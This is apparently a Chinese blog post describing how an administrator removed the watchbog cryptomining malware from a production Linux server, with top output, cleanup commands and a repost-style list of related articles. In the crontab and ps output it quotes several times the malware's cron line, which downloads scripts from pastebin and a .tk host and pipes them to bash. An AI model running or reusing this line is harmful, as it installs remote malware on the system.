挖矿病毒watchbog处理过程
- 1 挖矿病毒watchbog处理过程
简要说明
这段时间公司的生产服务器中了病毒watchbog,cpu动不动就是100%,查看cpu使用情况,发现很大一部分都是us,而且占100%左右的都是进程watchbog,怎么办?
前期操作:
#top -H
top - 23:46:20 up 2:20, 4 users, load average: 17.50, 11.47, 8.05
Threads: 876 total, 18 running, 858 sleeping, 0 stopped, 0 zombie
%Cpu(s): 99.9 us, 0.1 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 65806080 total, 50549892 free, 13517884 used, 1738304 buff/cache
KiB Swap: 8388604 total, 8388604 free, 0 used. 51616500 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
26548 root 20 0 74908 4452 4 R 99.7 0.0 4:40.07 watchbog #全部这个程序占用cpu
26551 root 20 0 74908 4452 4 R 99.7 0.0 4:38.46 watchbog
26553 root 20 0 74908 4452 4 R 99.7 0.0 4:40.15 watchbog
26555 root 20 0 74908 4452 4 R 99.7 0.0 4:39.08 watchbog
26543 root 20 0 74908 4452 4 R 99.4 0.0 4:39.48 watchbog
26544 root 20 0 74908 4452 4 R 99.4 0.0 4:39.75 watchbog
26545 root 20 0 74908 4452 4 R 99.4 0.0 4:39.82 watchbog
26546 root 20 0 74908 4452 4 R 99.4 0.0 4:40.17 watchbog
26547 root 20 0 74908 4452 4 R 99.4 0.0 4:39.04 watchbog
26549 root 20 0 74908 4452 4 R 99.4 0.0 4:40.04 watchbog
26550 root 20 0 74908 4452 4 R 99.4 0.0 4:40.20 watchbog
26554 root 20 0 74908 4452 4 R 99.4 0.0 4:39.09 watchbog
26556 root 20 0 74908 4452 4 R 99.4 0.0 4:39.86 watchbog
26557 root 20 0 74908 4452 4 R 99.4 0.0 4:39.90 watchbog
26558 root 20 0 74908 4452 4 R 99.4 0.0 4:39.87 watchbog
26552 root 20 0 74908 4452 4 R 98.1 0.0 4:38.92 watchbog
25344 root 20 0 148956 2952 1448 R 1.6 0.0 0:04.71 top
1556 root 20 0 0 0 0 S 0.3 0.0 0:07.39 xfsaild/dm-1
2957 root 20 0 455156 8144 6264 S 0.3 0.0 0:00.58 NetworkManager
3019 root 20 0 391352 6004 3136 S 0.3 0.0 0:00.20 gdbus
3784 root 20 0 42.587g 9.874g 16528 S 0.3 15.7 0:08.14 java
7693 root 20 0 42.587g 9.874g 16528 S 0.3 15.7 0:00.52 java
7315 root 20 0 2629884 49276 17088 S 0.3 0.1 0:03.24 phantomjs
11885 nobody 20 0 24380 3924 2100 S 0.3 0.0 0:00.69 nginx
1 root 20 0 189920 4972 2516 S 0.0 0.0 0:04.27 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.01 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.28 ksoftirqd/0
5 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H
6 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kworker/u32:0
7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kworker/u33:0
8 root rt 0 0 0 0 S 0.0 0.0 0:00.32 migration/0
9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh
查看并分析
针对此问题,及时查找出问题根源,先查看定时任务及相应的目录
#ll /etc/cron
cron.d/ cron.deny cron.monthly/ cron.weekly/
cron.daily/ cron.hourly/ crontab
#ll /etc/cron.d
total 28
-rw-r--r--. 1 root root 128 Jul 8 2014 0hourly
-rw-r--r-- 1 root root 539 Jan 11 2015 apache
-rw-r--r--. 1 root root 108 Jan 20 2015 raid-check
-rw-r--r-- 1 root root 539 Jan 11 2015 root
-rw-------. 1 root root 235 Nov 12 2014 sysstat
-rw-r--r-- 1 root root 539 Jan 11 2015 system
-rw-r--r--. 1 root root 187 Jan 28 2014 unbound-anchor
#crontab -l
*/9 * * * * sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
##
定时任务全是这样的任务,先删除先。
解决步骤:
步骤一:
首先把定时任务的目录权限修改
#chmod -R 500 /etc/crontab
#chmod -R 500 /etc/cron.monthly
#chmod -R 500 /etc/cron.weekly
#chmod -R 500 /etc/cron.daily
#chmod -R 500 /etc/cron.hourly
#vim /etc/crontab #删除不正常的
#rm -rf /etc/cron.monthly/* /etc/weekly/* /etc/cron.daily/* /etc/cron.hourly/* #目录下所有的文件都删除
并根据crontab文件中,判断把/usr/bin/watchbog /usr/bin/httpntp /usr/bin/ftpsdns这几个文件删除
#rm -rf /usr/bin/watchbog /usr/bin/httpntp /usr/bin/ftpsdns
并停掉进程
#ps -ef |grep watchbog|grep -v grep |awk '{print $2}'|xargs kill -9
初步操作之后,以为可以完成,但是几分钟后,cpu又是百分之百了,看来没有找到问题的根源,继续找
根据百度上的别人关于此问题的解决方法,先操作一下:
步骤二:
#iptables -A INPUT -s pastebin.com -j DROP
#iptables -A OUTPUT -s pastebin.com -j DROP
#iptables -nL
并再次进行步骤一的操作。
然后继续观察,几分钟后,watchbog病毒又来了,看来这种方法不是很有效,没有找到真正找到病毒的根源
继续观察,发现如下问题
#ps -ef |grep wget
root 973 910 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 974 841 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 975 845 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 976 856 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 977 855 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|base
进行关闭wget进程时出现错误:
#ps -ef |grep wget|grep -v grep |xargs kill -9
kill: cannot find process "root"
Killed
同样,curl命令也感染了。
#ps -ef|grep curl
root 974 841 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 975 845 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 976 856 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 977 855 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 978 881 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 979 835 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 980 851 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
root 983 865 0 07:57 ? 00:00:00 /bin/sh -c sed -i '/pastebin.com/d' /etc/hosts; sed -i '/aziplcr72qjhzvin/d' /etc/hosts; (curl -fsSL https://pastebin.com/raw/JgTVYWRY||wget -q -O- https://pastebin.com/raw/JgTVYWRY||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/dGKgNgsX").read()'||curl -fsSL https://pastebin.com/raw/VG7a0nkZ||wget -q -O - https://pastebin.com/raw/VG7a0nkZ||curl -fsSLk luckyboy666.tk:9080/host-manager/olds.txt -m 90||wget -q -O - luckyboy666.tk:9080/host-manager/olds.txt --no-check-certificate -t 2 -T 60)|bash
同样删除也不行
#ps -ef |grep curl|grep -v grep |xargs kill -9
kill: cannot find process "root"
Killed
针对此问题,进行步骤三
1、先把命令curl,wget重命名
#mv /usr/bin/curl /usr/bin/lruc
#mv /usr/bin/wget /usr/bin/tegw
2、然后再次进行步骤一的操作
3、观察cpu的使用情况
#top -H
经过一二天的观察 ,最终确认此问题解决了
解决步骤再重复一下
第一步:
先把curl,wget命令重命名,请看步骤三
第二步:
删除定时任务及对应的挖矿病毒文件,请看步骤一
第三步:
把病毒网站拒绝其访问,请看步骤二
第四步:
再次启动一下xshell时,再次监控
echo "Welcome your!"
bash: curl: command not found...
bash: wget: command not found...
bash: curl: command not found...
bash: wget: command not found...
bash: curl: command not found...
bash: wget: command not found...
bash: curl: command not found...
bash: wget: command not found...
bash: curl: command not found...
bash: wget: command not found...
bash: curl: command not found...
bash: wget: command not found...
就会发现原来挖矿病毒的使用什么技术来达到的,找到问题根源,就解决此问题了
至此,以上为挖矿病毒的解决方法。
挖矿病毒watchbog处理过程的更多相关文章
- 记一次生产主机中挖矿病毒"kintegrityds"处理过程!
[记一次生产挖矿病毒处理过程]: 可能性:webaap用户密码泄露.Jenkins/redis弱口令等. 1.监控到生产主机一直load告警 2.进服务器 top查看进程,发现挖矿病毒进程,此进程持续 ...
- Watchbog挖矿病毒程序排查过程
第1章 情况 1)服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示: 2)并且无论如何都杀不掉,用kill杀掉后,其还是会隔一会 ...
- 记一次Linux服务器因redis漏洞的挖矿病毒入侵
中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱. 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!! ...
- Linux应急响应(三):挖矿病毒
0x00 前言 随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式.新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染 ...
- Window应急响应(六):NesMiner挖矿病毒
0x00 前言 作为一个运维工程师,而非一个专业的病毒分析工程师,遇到了比较复杂的病毒怎么办?别怕,虽然对二进制不熟,但是依靠系统运维的经验,我们可以用自己的方式来解决它. 0x01 感染现象 1.向 ...
- Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)
概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...
- Linux挖矿病毒 khugepageds详细解决步骤
一.背景 最近公司一台虚拟机被攻击,其中一种挖矿病毒.会伪CPU数.即如果用top命令只能看到一个cpu.并且负载不高.实际上整个负载300%以上,及时定时任务关掉也不起作用. 二.言归正传开始干掉这 ...
- 挖矿病毒、ddos入侵流程及溯源
一 挖矿病毒简介 攻击者利用相关安全隐患向目标机器种植病毒的行为. 二 攻击方式 攻击者通常利用弱口令.未授权.代码执行.命令执行等漏洞进行传播.示例如下: 示例1: POST /tmUnblo ...
- qW3xT.2,解决挖矿病毒。
网站在运行期间感觉怪怪的,响应速度慢的不是一丁半点,带宽5M,不该是这样的呀 于是登录Xshell top命令 查看cpu情况如下 PID为3435的进程占用CPU过大,难道被病毒入侵了吗? 查看该进 ...
随机推荐
- charles 白名单
本文参考:charles 白名单 charles 白名单 白名单工具,允许您阻止除选定位置之外的所有请求. 注意:如果一个请求与"黑名单"和"白名单"同时匹配成 ...
- 【DSP开发】利用CCS5.4开发基于DSP6455的JPEG2000图像解压缩过程
[DSP开发]利用CCS5.4开发基于DSP6455的JPEG2000图像解压缩过程 声明:引用请注明出处http://blog.csdn.net/lg1259156776/ 说明:前端是时间基于VS ...
- Ctrl + 逗号快捷键被占用[搜狗输入法]
Ctrl+,(或者Ctrl+逗号)被占用. 快捷键忽然不能用了,只要一用快捷键自动唤醒搜狗输入法,呵呵.极度影响使用. 就说怎么禁掉吧: 其他快捷键禁用参考 参考: 搜狗桌面论坛 注:搜狗输入法一次占 ...
- python for循环 - python基础入门(11)
在python开发中,除了前篇文章介绍的while循环还有一个for循环也经常使用,两者使用都是大同小异,for循环的使用相对于while循环更加灵活,下面我们一起来了解下具体区别. 一.for 循环 ...
- 超全的IE兼容性问题及解决方案
1.怪异盒模型:在老版本IE下不设置文档声明,页面就会进入怪异盒模型解析,所以要设置文档声明: 2.IE6下,子元素的宽高超出父级的宽高 :可以把父级设 置好的宽度撑开 3.在IE6下,块属性元素的高 ...
- PowerShell->>获取本地计算机的用户组和组成员
获取本地计算机的用户组和组成员 function Get-LocalGroups() { net localgroup | ?{ $_ -match "^\*.*" } | %{ ...
- superset的安装(win10)踩踩坑!AWSL
基本安装参考https://www.jianshu.com/p/8b27ff71429f 按此方案装的时候会遇到各种flask版本不兼容的问题,所以 第一步:装好anaconda 第二部:保证好高于V ...
- 笔记-8:使用turtle库进行图形绘制
1.窗体函数 turtle.setup(width,height,startx,starty) 作用:设置窗体的大小和位置 width:窗口宽度,如果值是整数,表示像素值:如果值是小数,表示窗口宽度与 ...
- IDEA中通过Maven插件使用MyBatis Generator
这样做更简单,参考: IDEA集成MyBatis Generator 插件 详解
- css line-height & 图片底部间隙的处理
前言:这是笔者学习之后自己的理解与整理.如果有错误或者疑问的地方,请大家指正,我会持续更新! 看大牛张鑫旭的视屏可能会理解的更深一些,点击这里 . line-height 的学习 line-heigh ...